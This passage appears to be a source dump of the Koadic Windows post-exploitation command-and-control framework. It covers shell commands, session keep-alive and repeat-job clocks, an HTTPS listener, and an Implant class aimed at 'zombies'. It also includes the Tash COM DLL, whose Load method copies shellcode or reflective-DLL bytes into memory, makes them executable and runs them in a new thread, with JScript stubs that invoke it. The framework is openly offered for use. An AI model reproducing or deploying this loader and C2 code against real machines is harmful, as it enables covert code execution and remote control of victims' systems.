x.upper().startswith(text.upper())] 21 | if options: 22 | return options[state] 23 | 24 | options = [x.name + " " for x in env.options.options if x.name.upper().startswith(text.upper()) and not x.hidden] 25 | options += [x.alias + " " for x in env.options.options if x.alias.upper().startswith(text.upper()) and not x.hidden and x.alias] 26 | 27 | try: 28 | return options[state] 29 | except: 30 | return None 31 | 32 | def filepaths(text): 33 | import readline 34 | everything = readline.get_line_buffer() 35 | cursor_idx = readline.get_begidx() 36 | idx = 0 37 | for chunk in everything.split(" "): 38 | fullpath = chunk 39 | idx += len(chunk) + 1 40 | if idx > cursor_idx: 41 | break 42 | 43 | if os.path.isfile(fullpath): 44 | return None 45 | if "/" in fullpath: 46 | d = os.path.dirname(fullpath) 47 | else: 48 | d = "." 49 | 50 | res = [] 51 | for candidate in os.listdir(d): 52 | if not candidate.startswith(text): 53 | continue 54 | if os.path.isdir(d+os.path.sep+candidate): 55 | res.append(candidate + os.path.sep) 56 | else: 57 | res.append(candidate + " ") 58 | return res 59 | 60 | def help(shell): 61 | pass 62 | 63 | def execute(shell, cmd): 64 | env = shell.plugins[shell.state] 65 | 66 | splitted = cmd.split() 67 | if len(splitted) > 1: 68 | key = splitted[1].upper() 69 | 70 | value = env.options.get(key) 71 | if value != None: 72 | 73 | # if it's >2, we set the third argument 74 | if len(splitted) > 2: 75 | value = cmd.split(None, 2)[2] 76 | if not env.options.set(key, value): 77 | shell.print_error("That value is invalid") 78 | return 79 | 80 | shell.print_good("%s => %s" % (key, value)) 81 | else: 82 | shell.print_error("Option '%s' not found." % (key)) 83 | -------------------------------------------------------------------------------- /core/commands/sounds.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "turn sounds off/on: sound(0|1)" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | try: 11 | import playsound 12 | except: 13 | shell.print_error('You do not have the playsound module installed. Please run \'pip install playsound\' to enable this feature!') 14 | return 15 | 16 | splitted = cmd.split() 17 | 18 | if len(splitted) > 1: 19 | sw = splitted[1].lower() 20 | if sw == "1" or sw == "true" or sw == "on": 21 | from core.sounds import sounds 22 | shell.sounds = sounds 23 | shell.play_sound('ON') 24 | else: 25 | shell.sounds = {} 26 | 27 | shell.print_status("Sounds: %s" % ("On" if shell.sounds else "Off")) 28 | -------------------------------------------------------------------------------- /core/commands/spool.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | DESCRIPTION = "write output to a file" 4 | 5 | def autocomplete(shell, line, text, state): 6 | options = filepaths(text) 7 | return options[state] 8 | 9 | def help(shell): 10 | shell.print_plain("") 11 | shell.print_plain("Use %s to spool to /tmp/koadic.spool" % (shell.colors.colorize("spool on", shell.colors.BOLD))) 12 | shell.print_plain("Use %s to spool to a defined file" % (shell.colors.colorize("spool FILEPATH", shell.colors.BOLD))) 13 | shell.print_plain("Use %s to stop spooling" % (shell.colors.colorize("spool off", shell.colors.BOLD))) 14 | shell.print_plain("") 15 | 16 | def filepaths(text): 17 | import readline 18 | everything = readline.get_line_buffer() 19 | cursor_idx = readline.get_begidx() 20 | idx = 0 21 | for chunk in everything.split(" "): 22 | fullpath = chunk 23 | idx += len(chunk) + 1 24 | if idx > cursor_idx: 25 | break 26 | 27 | if os.path.isfile(fullpath): 28 | return None 29 | if "/" in fullpath: 30 | d = os.path.dirname(fullpath) 31 | else: 32 | d = "." 33 | 34 | res = [] 35 | for candidate in os.listdir(d): 36 | if not candidate.startswith(text): 37 | continue 38 | if os.path.isdir(d+os.path.sep+candidate): 39 | res.append(candidate + os.path.sep) 40 | else: 41 | res.append(candidate + " ") 42 | return res 43 | 44 | def execute(shell, cmd): 45 | 46 | splitted = cmd.split() 47 | 48 | if len(splitted) > 1: 49 | option = splitted[1] 50 | if option == 'on': 51 | shell.spool = '/tmp/koadic.spool' 52 | shell.print_status("Spooling to /tmp/koadic.spool...") 53 | elif option == 'off': 54 | if shell.spool: 55 | shell.spool = False 56 | shell.print_status("Spooling stopped...") 57 | else: 58 | shell.spool = option 59 | shell.print_status("Spooling to "+option+"...") 60 | else: 61 | help(shell) 62 | -------------------------------------------------------------------------------- /core/commands/taco.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "taco time" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | 11 | print(open("data/taco.txt", "rb").read().decode("unicode_escape")) 12 | -------------------------------------------------------------------------------- /core/commands/unset.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "unsets a variable for the current module" 2 | 3 | def autocomplete(shell, line, text, state): 4 | 5 | # todo, here we can provide some defaults for bools/enums? i.e. True/False 6 | if len(line.split()) > 2: 7 | return None 8 | 9 | env = shell.plugins[shell.state] 10 | options = [x.name + " " for x in env.options.options if x.name.upper().startswith(text.upper()) and not x.hidden] 11 | options += [x.alias + " " for x in env.options.options if x.alias.upper().startswith(text.upper()) and not x.hidden and x.alias] 12 | 13 | try: 14 | return options[state] 15 | except: 16 | return None 17 | 18 | def help(shell): 19 | pass 20 | 21 | def execute(shell, cmd): 22 | env = shell.plugins[shell.state] 23 | 24 | splitted = cmd.split() 25 | if len(splitted) > 1: 26 | key = splitted[1].upper() 27 | 28 | value = env.options.get(key) 29 | if value != None: 30 | 31 | value = "" 32 | if not env.options.set(key, value): 33 | shell.print_error("That value is invalid") 34 | return 35 | 36 | shell.print_good("%s => %s" % (key, value)) 37 | else: 38 | shell.print_error("Option '%s' not found." % (key)) 39 | -------------------------------------------------------------------------------- /core/commands/use.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "switch to a different module" 2 | 3 | def autocomplete(shell, line, text, state): 4 | import readline 5 | everything = readline.get_line_buffer() 6 | cursor_idx = readline.get_begidx() 7 | idx = 0 8 | for chunk in everything.split(" "): 9 | fulltext = chunk 10 | idx += len(chunk) + 1 11 | if idx > cursor_idx: 12 | break 13 | prefix, suffix = fulltext.rsplit("/",maxsplit=1) if "/" in fulltext else ("",fulltext) 14 | if prefix: 15 | prefix += "/" 16 | 17 | options = [] 18 | tmp = list(shell.plugins.keys()) 19 | for plugin in shell.plugins: 20 | tmp.append(plugin.split("/")[-1]) 21 | for plugin in tmp: 22 | if not plugin.startswith(fulltext): 23 | continue 24 | chunk = plugin[len(prefix):] 25 | if "/" in chunk: 26 | options.append(chunk.split("/")[0]+"/") 27 | else: 28 | options.append(chunk+" ") 29 | options = list(sorted(set(options))) 30 | try: 31 | return options[state] 32 | except: 33 | return None 34 | 35 | def help(shell): 36 | pass 37 | 38 | def execute(shell, cmd): 39 | splitted = cmd.split() 40 | 41 | if len(splitted) > 1: 42 | module = splitted[1] 43 | if "/" not in module: 44 | module = [k for k in shell.plugins if k.lower().split('/')[-1] == module.lower()][0] 45 | if module not in shell.plugins: 46 | shell.print_error("No module named %s" % (module)) 47 | return 48 | 49 | shell.previous = shell.state 50 | shell.state = module 51 | -------------------------------------------------------------------------------- /core/commands/valentine.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "Love is in the wire" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | 11 | print(open("data/valentine.txt", "rb").read().decode("unicode_escape")) 12 | -------------------------------------------------------------------------------- /core/commands/verbose.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "turn verbosity off/on: verbose (0|1)" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | splitted = cmd.split() 11 | 12 | if len(splitted) > 1: 13 | sw = splitted[1].lower() 14 | if sw == "1" or sw == "true" or sw == "on": 15 | shell.verbose = True 16 | else: 17 | shell.verbose = False 18 | 19 | shell.print_status("Verbose mode: %s" % ("On" if shell.verbose else "Off")) 20 | -------------------------------------------------------------------------------- /core/extant.py: -------------------------------------------------------------------------------- 1 | import threading 2 | import time 3 | 4 | import core.session 5 | 6 | ''' Periodically checks if sessions are alive ''' 7 | class Extant(object): 8 | 9 | def __init__(self, shell): 10 | self.shell = shell 11 | self.check_alive_timer = None 12 | self.check() 13 | 14 | def check(self): 15 | if self.check_alive_timer is not None: 16 | self.check_alive_timer.cancel() 17 | 18 | self.check_alive_timer = threading.Timer(1.0, self.check) 19 | self.check_alive_timer.daemon = True 20 | self.check_alive_timer.start() 21 | 22 | now = time.time() 23 | 24 | max_delta = 10 25 | 26 | for skey, session in self.shell.sessions.items(): 27 | delta = now - session.last_active 28 | #delta = datetime.timedelta(seconds=int(delta)) 29 | 30 | if session.status == core.session.Session.ALIVE: 31 | if delta > max_delta: 32 | self.shell.play_sound('TIMEOUT') 33 | session.set_dead() 34 | else: 35 | if delta < max_delta: 36 | self.shell.play_sound('RECONNECT') 37 | session.set_reconnect() 38 | -------------------------------------------------------------------------------- /core/implant.py: -------------------------------------------------------------------------------- 1 | import core.plugin 2 | import threading 3 | 4 | class Implant(core.plugin.Plugin): 5 | RJOB_ID = 0 6 | RJOB_ID_LOCK = threading.Lock() 7 | 8 | def __init__(self, shell): 9 | super(Implant, self).__init__(shell) 10 | self.options.register("ZOMBIE", "ALL", "the zombie to target") 11 | self.options.register("IGNOREADMIN", "false", "ignore session elevation restrictions", enum=["true", "false"], advanced=True) 12 | self.options.register("IGNOREBUILD", "false", "ignore build number", enum=["true", "false"], advanced=True) 13 | self.options.register("REPEAT", "false", "Run the implant multiple times", boolean = True, advanced = True) 14 | self.options.register("REPEATTIME", "600", "Seconds between running implant", advanced = True) 15 | self.options.register("REPEATCYCLES", "3", "Number of times to run (0 = indefinite)", advanced = True) 16 | 17 | def repeat(self, shell, workloads, options): 18 | rt = int(self.options.get("REPEATTIME")) 19 | rc = int(self.options.get("REPEATCYCLES")) 20 | state = self.STATE 21 | with Implant.RJOB_ID_LOCK: 22 | key = str(Implant.RJOB_ID) 23 | Implant.RJOB_ID += 1 24 | shell.repeatjobs[key] = [rt, rc, workloads, self.job, rt, state, options, self] 25 | -------------------------------------------------------------------------------- /core/options.py: -------------------------------------------------------------------------------- 1 | 2 | class Option(object): 3 | def __init__(self, name, value, description, **kwargs): 4 | self.name = name 5 | self.description = description 6 | self.validate = None 7 | self.required = True 8 | self.advanced = False 9 | self.hidden = False 10 | self.boolean = False 11 | self.file = False 12 | self.implant = False 13 | self.alias = "" 14 | self.enum = [] 15 | self.value = value 16 | self.default = value 17 | self.__dict__.update(kwargs) 18 | 19 | def set(self, value): 20 | if self.validate is not None: 21 | if not self.validate(value): 22 | return False 23 | 24 | elif len(self.enum) > 0: 25 | if value not in self.enum: 26 | return False 27 | 28 | self.value = value 29 | return True 30 | 31 | class Options(object): 32 | def __init__(self): 33 | self.options = [] 34 | 35 | def register(self, name, value, description, **kwargs): 36 | name = name.upper() 37 | option = Option(name, value, description, **kwargs) 38 | self.options.append(option) 39 | 40 | def get(self, name): 41 | name = name.upper() 42 | for option in self.options: 43 | if option.name == name or option.alias == name and name: 44 | return option.value 45 | 46 | return None 47 | 48 | def set(self, name, value): 49 | name = name.upper() 50 | 51 | for option in self.options: 52 | if option.name == name or option.alias == name and name: 53 | return option.set(value) 54 | 55 | return False 56 | 57 | def copy(self): 58 | import copy 59 | return copy.deepcopy(self) 60 | -------------------------------------------------------------------------------- /core/payload.py: -------------------------------------------------------------------------------- 1 | import threading 2 | 3 | class Payload(object): 4 | PAYLOAD_ID = 0 5 | PAYLOAD_ID_LOCK = threading.Lock() 6 | 7 | def __init__(self, data=""): 8 | self.data = data 9 | with Payload.PAYLOAD_ID_LOCK: 10 | self.id = Payload.PAYLOAD_ID 11 | Payload.PAYLOAD_ID += 1 12 | -------------------------------------------------------------------------------- /core/repeatjobclock.py: -------------------------------------------------------------------------------- 1 | import threading 2 | 3 | ''' Updates clock and runs repeat jobs ''' 4 | class RepeatJobClock(object): 5 | 6 | def __init__(self, shell): 7 | self.shell = shell 8 | self.check_alive_timer = None 9 | self.check() 10 | 11 | def check(self): 12 | if self.check_alive_timer is not None: 13 | self.check_alive_timer.cancel() 14 | 15 | self.check_alive_timer = threading.Timer(1.0, self.check) 16 | self.check_alive_timer.daemon = True 17 | self.check_alive_timer.start() 18 | 19 | remove_jobs = [] 20 | 21 | for rjob in self.shell.repeatjobs: 22 | rjobval = self.shell.repeatjobs[rjob] 23 | if rjobval[0] > 0: 24 | rjobval[0] = rjobval[0]- 1 25 | continue 26 | 27 | zombie = [o.value for o in rjobval[6].options if o.name == "ZOMBIE"][0] 28 | rjobval[7].dispatch(rjobval[2], rjobval[3], False, zombie) 29 | rjobval[0] = rjobval[4] 30 | 31 | if rjobval[1] == 0: 32 | continue 33 | if rjobval[1] > 2: 34 | rjobval[1] = rjobval[1] - 1 35 | continue 36 | 37 | remove_jobs.append(rjob) 38 | 39 | if remove_jobs: 40 | tmp = dict(self.shell.repeatjobs) 41 | for r in remove_jobs: 42 | del tmp[r] 43 | self.shell.repeatjobs = tmp 44 | -------------------------------------------------------------------------------- /core/server.py: -------------------------------------------------------------------------------- 1 | try: 2 | from SocketServer import ThreadingMixIn 3 | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer 4 | except: 5 | # why is python3 so terrible for backward compatibility? 6 | from socketserver import ThreadingMixIn 7 | from http.server import BaseHTTPRequestHandler, HTTPServer 8 | 9 | import core.handler 10 | import core.session 11 | import core.loader 12 | import core.payload 13 | 14 | import socket 15 | import random 16 | import threading 17 | import os 18 | import ssl 19 | import io 20 | import time 21 | import datetime 22 | import copy 23 | 24 | class ThreadedHTTPServer(ThreadingMixIn, HTTPServer): 25 | pass 26 | 27 | class Server(threading.Thread): 28 | def __init__(self, port, handler, keypath, certpath, shell, options): 29 | threading.Thread.__init__(self) 30 | self.daemon = True 31 | 32 | self.handler_class = handler 33 | self.port = port 34 | self.keypath = keypath 35 | self.certpath = certpath 36 | self.shell = shell 37 | self.options = options 38 | self.killed = False 39 | 40 | self._setup_server() 41 | 42 | def _setup_server(self): 43 | self.http = ThreadedHTTPServer(('0.0.0.0', self.port), self.handler_class) 44 | self.http.timeout = None 45 | self.http.daemon_threads = True 46 | self.http.server = self 47 | self.http.shell = self.shell 48 | self.http.options = self.options 49 | 50 | if self.keypath and self.certpath: 51 | self.keypath = os.path.abspath(self.keypath) 52 | self.certpath = os.path.abspath(self.certpath) 53 | self.http.socket = ssl.wrap_socket(self.http.socket, keyfile=self.keypath, certfile=self.certpath, server_side = True) 54 | 55 | def run(self): 56 | 57 | try: 58 | self.http.serve_forever() 59 | except: 60 | pass 61 | 62 | def shutdown(self): 63 | 64 | # shut down the server/socket 65 | self.http.shutdown() 66 | self.http.socket.close() 67 | self.http.server_close() 68 | self._Thread__stop() 69 | 70 | # make sure all the threads are killed 71 | for thread in threading.enumerate(): 72 | if thread.isAlive(): 73 | try: 74 | thread._Thread__stop() 75 | except: 76 | pass 77 | -------------------------------------------------------------------------------- /core/tick.py: -------------------------------------------------------------------------------- 1 | import core.extant 2 | import core.repeatjobclock 3 | import core.restoreclock 4 | 5 | ''' Kick off clocks ''' 6 | class Tick(object): 7 | 8 | def __init__(self, shell): 9 | self.start_timers(shell) 10 | 11 | def start_timers(self, shell): 12 | self.extant = core.extant.Extant(shell) 13 | self.repeatjobclock = core.repeatjobclock.RepeatJobClock(shell) 14 | self.restoreclock = core.restoreclock.RestoreClock(shell) 15 | -------------------------------------------------------------------------------- /data/banner.txt: -------------------------------------------------------------------------------- 1 | 2 | \033[36;1m.\033[0m 3 | \033[36;1m/\033[0m \033[36;1m\\\033[0m 4 | _ _ \033[36;1m|\033[0m \033[36;1m|\033[0m 5 | | | _____ __ _ __| |\033[36;1m|\033[0m \033[36;1m|\033[0m ___ 6 | | |/ / \033[31;1m_\033[0m \\ / _` |/ _` |\033[36;1m|\033[0m\033[34;1m.\033[0m\033[36;1m|\033[0m / __| 7 | | / \033[31;1m(o)\033[0m | (_| | (_| |\033[36;1m|\033[0m\033[34;1m.\033[0m\033[36;1m|\033[0m| (__ 8 | |_|\\_\\_\033[31;1m^\033[0m_/ \\__,_|\\__,_|\033[36;1m|\033[0m\033[34;1m:\033[0m\033[36;1m|\033[0m \\___| 9 | \033[36;1m|\033[0m\033[34;1m:\033[0m\033[36;1m|\033[0m 10 | ~\033[33;1m\\==8==/\033[0m~ 11 | \033[31;1m8\033[0m 12 | \033[31;1mO\033[0m 13 | -------------------------------------------------------------------------------- /data/banner_info.txt: -------------------------------------------------------------------------------- 1 | 2 | %s-{ \033[34;1mKoadic C3 - COM Command & Control\033[0m }- 3 | %s\033[32;1mWindows Post-Exploitation Tools\033[0m 4 | %s\033[3mEndless Intellect\033[0m 5 | 6 | %s~[ \033[1mVersion:\033[0m %%%s ]~ 7 | %s~[ \033[1mStagers:\033[0m %%%s ]~ 8 | %s~[ \033[1mImplants:\033[0m %%%s ]~ 9 | 10 | -------------------------------------------------------------------------------- /data/bin/Tash/Release/Tash.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/Tash/Release/Tash.dll -------------------------------------------------------------------------------- /data/bin/Tash/Release/Tash.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/Tash/Release/Tash.exp -------------------------------------------------------------------------------- /data/bin/Tash/Release/Tash.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/Tash/Release/Tash.lib -------------------------------------------------------------------------------- /data/bin/Tash/Release/TashClient.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/Tash/Release/TashClient.exe -------------------------------------------------------------------------------- /data/bin/Tash/Release/tash.x.js: -------------------------------------------------------------------------------- 1 | var manifestPath = "Tash.X.manifest"; 2 | 3 | var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); 4 | actCtx.Manifest = manifestPath; 5 | 6 | var tash = actCtx.CreateObject("Tash.TashLoader"); 7 | 8 | var res = tash.Load("\x90\x90\xc3", "~~", 1); 9 | WScript.Echo(res) 10 | 11 | -------------------------------------------------------------------------------- /data/bin/Tash/Release/tash.y.js: -------------------------------------------------------------------------------- 1 | var manifestPath = "Tash.Y.manifest"; 2 | 3 | var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); 4 | actCtx.Manifest = manifestPath; 5 | 6 | var tash = actCtx.CreateObject("Tash.TashLoader"); 7 | 8 | var res = tash.Load("\x90\x90\xc3", "~~", 1); 9 | WScript.Echo(res) 10 | 11 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual Studio 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Tash", "Tash\Tash.vcproj", "{684DCC5A-1FA6-41D7-A779-2D96BDAF478A}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TashClient", "TashClient\TashClient.vcproj", "{7507CE64-210F-424F-94CC-63A2FE4AD27E}" 7 | ProjectSection(ProjectDependencies) = postProject 8 | {684DCC5A-1FA6-41D7-A779-2D96BDAF478A} = {684DCC5A-1FA6-41D7-A779-2D96BDAF478A} 9 | EndProjectSection 10 | EndProject 11 | Global 12 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 13 | Debug|Win32 = Debug|Win32 14 | Release|Win32 = Release|Win32 15 | EndGlobalSection 16 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 17 | {684DCC5A-1FA6-41D7-A779-2D96BDAF478A}.Debug|Win32.ActiveCfg = Debug|Win32 18 | {684DCC5A-1FA6-41D7-A779-2D96BDAF478A}.Debug|Win32.Build.0 = Debug|Win32 19 | {684DCC5A-1FA6-41D7-A779-2D96BDAF478A}.Release|Win32.ActiveCfg = Release|Win32 20 | {684DCC5A-1FA6-41D7-A779-2D96BDAF478A}.Release|Win32.Build.0 = Release|Win32 21 | {7507CE64-210F-424F-94CC-63A2FE4AD27E}.Debug|Win32.ActiveCfg = Debug|Win32 22 | {7507CE64-210F-424F-94CC-63A2FE4AD27E}.Debug|Win32.Build.0 = Debug|Win32 23 | {7507CE64-210F-424F-94CC-63A2FE4AD27E}.Release|Win32.ActiveCfg = Release|Win32 24 | {7507CE64-210F-424F-94CC-63A2FE4AD27E}.Release|Win32.Build.0 = Release|Win32 25 | EndGlobalSection 26 | GlobalSection(SolutionProperties) = preSolution 27 | HideSolutionNode = FALSE 28 | EndGlobalSection 29 | EndGlobal 30 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/Tash/Tash.suo -------------------------------------------------------------------------------- /data/bin/Tash/Tash/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | ACTIVE TEMPLATE LIBRARY : Tash Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this Tash project for you to use as the starting point for 6 | writing your Dynamic Link Library (DLL). 7 | 8 | This file contains a summary of what you will find in each of the files that 9 | make up your project. 10 | 11 | Tash.vcproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | Tash.idl 18 | This file contains the IDL definitions of the type library, the interfaces 19 | and co-classes defined in your project. 20 | This file will be processed by the MIDL compiler to generate: 21 | C++ interface definitions and GUID declarations (Tash.h) 22 | GUID definitions (Tash_i.c) 23 | A type library (Tash.tlb) 24 | Marshaling code (Tash_p.c and dlldata.c) 25 | 26 | Tash.h 27 | This file contains the C++ interface definitions and GUID declarations of the 28 | items defined in Tash.idl. It will be regenerated by MIDL during compilation. 29 | 30 | Tash.cpp 31 | This file contains the object map and the implementation of your DLL's exports. 32 | 33 | Tash.rc 34 | This is a listing of all of the Microsoft Windows resources that the 35 | program uses. 36 | 37 | Tash.def 38 | This module-definition file provides the linker with information about the exports 39 | required by your DLL. It contains exports for: 40 | DllGetClassObject 41 | DllCanUnloadNow 42 | DllRegisterServer 43 | DllUnregisterServer 44 | 45 | ///////////////////////////////////////////////////////////////////////////// 46 | Other standard files: 47 | 48 | StdAfx.h, StdAfx.cpp 49 | These files are used to build a precompiled header (PCH) file 50 | named Tash.pch and a precompiled types file named StdAfx.obj. 51 | 52 | Resource.h 53 | This is the standard header file that defines resource IDs. 54 | 55 | 56 | ///////////////////////////////////////////////////////////////////////////// 57 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/Tash.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/Tash/Tash/Tash.aps -------------------------------------------------------------------------------- /data/bin/Tash/Tash/Tash.cpp: -------------------------------------------------------------------------------- 1 | // Tash.cpp : Implementation of DLL Exports. 2 | 3 | 4 | #include "stdafx.h" 5 | #include "resource.h" 6 | #include "Tash_i.h" 7 | #include "dllmain.h" 8 | #include "dlldatax.h" 9 | 10 | // Used to determine whether the DLL can be unloaded by OLE 11 | STDAPI DllCanUnloadNow(void) 12 | { 13 | #ifdef _MERGE_PROXYSTUB 14 | HRESULT hr = PrxDllCanUnloadNow(); 15 | if (hr != S_OK) 16 | return hr; 17 | #endif 18 | return _AtlModule.DllCanUnloadNow(); 19 | } 20 | 21 | 22 | // Returns a class factory to create an object of the requested type 23 | STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv) 24 | { 25 | LPOLESTR sClsIID; 26 | 27 | HRESULT hr = StringFromIID(rclsid, &sClsIID); 28 | 29 | if (FAILED(hr)) 30 | return hr; 31 | 32 | MessageBoxW(NULL, sClsIID, L"Tash - DllGetClassObject()", MB_OK); 33 | 34 | CoTaskMemFree(sClsIID); 35 | 36 | #ifdef _MERGE_PROXYSTUB 37 | if (PrxDllGetClassObject(rclsid, riid, ppv) == S_OK) 38 | return S_OK; 39 | #endif 40 | return _AtlModule.DllGetClassObject(rclsid, riid, ppv); 41 | } 42 | 43 | 44 | // DllRegisterServer - Adds entries to the system registry 45 | STDAPI DllRegisterServer(void) 46 | { 47 | // registers object, typelib and all interfaces in typelib 48 | HRESULT hr = _AtlModule.DllRegisterServer(); 49 | #ifdef _MERGE_PROXYSTUB 50 | if (FAILED(hr)) 51 | return hr; 52 | hr = PrxDllRegisterServer(); 53 | #endif 54 | return hr; 55 | } 56 | 57 | 58 | // DllUnregisterServer - Removes entries from the system registry 59 | STDAPI DllUnregisterServer(void) 60 | { 61 | HRESULT hr = _AtlModule.DllUnregisterServer(); 62 | #ifdef _MERGE_PROXYSTUB 63 | if (FAILED(hr)) 64 | return hr; 65 | hr = PrxDllRegisterServer(); 66 | if (FAILED(hr)) 67 | return hr; 68 | hr = PrxDllUnregisterServer(); 69 | #endif 70 | return hr; 71 | } 72 | 73 | // DllInstall - Adds/Removes entries to the system registry per user 74 | // per machine. 75 | STDAPI DllInstall(BOOL bInstall, LPCWSTR pszCmdLine) 76 | { 77 | HRESULT hr = E_FAIL; 78 | static const wchar_t szUserSwitch[] = _T("user"); 79 | 80 | if (pszCmdLine != NULL) 81 | { 82 | if (_wcsnicmp(pszCmdLine, szUserSwitch, _countof(szUserSwitch)) == 0) 83 | { 84 | AtlSetPerUserRegistration(true); 85 | } 86 | } 87 | 88 | if (bInstall) 89 | { 90 | hr = DllRegisterServer(); 91 | if (FAILED(hr)) 92 | { 93 | DllUnregisterServer(); 94 | } 95 | } 96 | else 97 | { 98 | hr = DllUnregisterServer(); 99 | } 100 | 101 | return hr; 102 | } 103 | 104 | 105 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/Tash.def: -------------------------------------------------------------------------------- 1 | ; Tash.def : Declares the module parameters. 2 | 3 | LIBRARY "Tash.DLL" 4 | 5 | EXPORTS 6 | DllCanUnloadNow PRIVATE 7 | DllGetClassObject PRIVATE 8 | DllRegisterServer PRIVATE 9 | DllUnregisterServer PRIVATE 10 | DllInstall PRIVATE 11 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/Tash.idl: -------------------------------------------------------------------------------- 1 | // Tash.idl : IDL source for Tash 2 | // 3 | 4 | // This file will be processed by the MIDL tool to 5 | // produce the type library (Tash.tlb) and marshalling code. 6 | 7 | import "oaidl.idl"; 8 | import "ocidl.idl"; 9 | 10 | [ 11 | object, 12 | uuid(5FF70415-14AE-403D-AADD-A797348C8967), 13 | dual, 14 | nonextensible, 15 | helpstring("ITashLoader Interface"), 16 | pointer_default(unique) 17 | ] 18 | interface ITashLoader : IDispatch{ 19 | [id(1), helpstring("method Load")] HRESULT Load([in] BSTR sCode, [in] BSTR sParam, [in] ULONG dwOffset, [out,retval] ULONG* dwErr); 20 | }; 21 | [ 22 | uuid(830CFF36-9188-45DF-9EF3-D14C1D12A3A4), 23 | version(1.0), 24 | helpstring("Tash 1.0 Type Library") 25 | ] 26 | library TashLib 27 | { 28 | importlib("stdole2.tlb"); 29 | [ 30 | uuid(6AA5DEAB-5B77-4D09-BD8D-8EE26F2964AA), 31 | helpstring("TashLoader Class") 32 | ] 33 | coclass TashLoader 34 | { 35 | [default] interface ITashLoader; 36 | }; 37 | }; 38 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/Tash.rgs: -------------------------------------------------------------------------------- 1 | HKCR 2 | { 3 | NoRemove AppID 4 | { 5 | '%APPID%' = s 'Tash' 6 | 'Tash.DLL' 7 | { 8 | val AppID = s '%APPID%' 9 | } 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/TashLoader.cpp: -------------------------------------------------------------------------------- 1 | // TashLoader.cpp : Implementation of CTashLoader 2 | 3 | #include "stdafx.h" 4 | #include "TashLoader.h" 5 | 6 | 7 | // CTashLoader 8 | 9 | 10 | /** 11 | * sCode - shellcode/reflective DLL bytes, will be fixed from BSTR 12 | * sParam - parameter to pass to new thread, will NOT be fixed from BSTR 13 | * dwOffset - where in sCode buffer the entry point is (i.e. reflective loader export) 14 | * dwErr - returns win32 user errno 15 | */ 16 | STDMETHODIMP CTashLoader::Load(BSTR sCode, BSTR sParam, ULONG dwOffset, ULONG* dwErr) 17 | { 18 | do 19 | { 20 | UINT dwSize = SysStringLen(sCode); 21 | 22 | PVOID pAddr = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); 23 | 24 | if (pAddr == NULL) 25 | break; 26 | 27 | // every-other byte memcpy because of BSTR wchar_t 28 | for (UINT i = 0; i < dwSize; ++i) 29 | { 30 | ((BYTE*)pAddr)[i] = ((BYTE*)sCode)[i * 2]; 31 | //printf("%02x ", ((BYTE*)pAddr)[i]); 32 | } 33 | 34 | DWORD dwOldProtect; 35 | 36 | if (!VirtualProtect(pAddr, dwSize, PAGE_EXECUTE_READ, &dwOldProtect)) 37 | break; 38 | 39 | HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) ((BYTE*)pAddr + dwOffset), (PVOID)sParam, 0, NULL); 40 | 41 | if (hThread == NULL) 42 | break; 43 | 44 | // wait for shellcode/reflective DLL to complete its operations, process will die quickly after we return 45 | WaitForSingleObject(hThread, INFINITE); 46 | 47 | SetLastError(ERROR_SUCCESS); 48 | } while (0); 49 | /* */ 50 | 51 | *dwErr = GetLastError(); 52 | return S_OK; 53 | } -------------------------------------------------------------------------------- 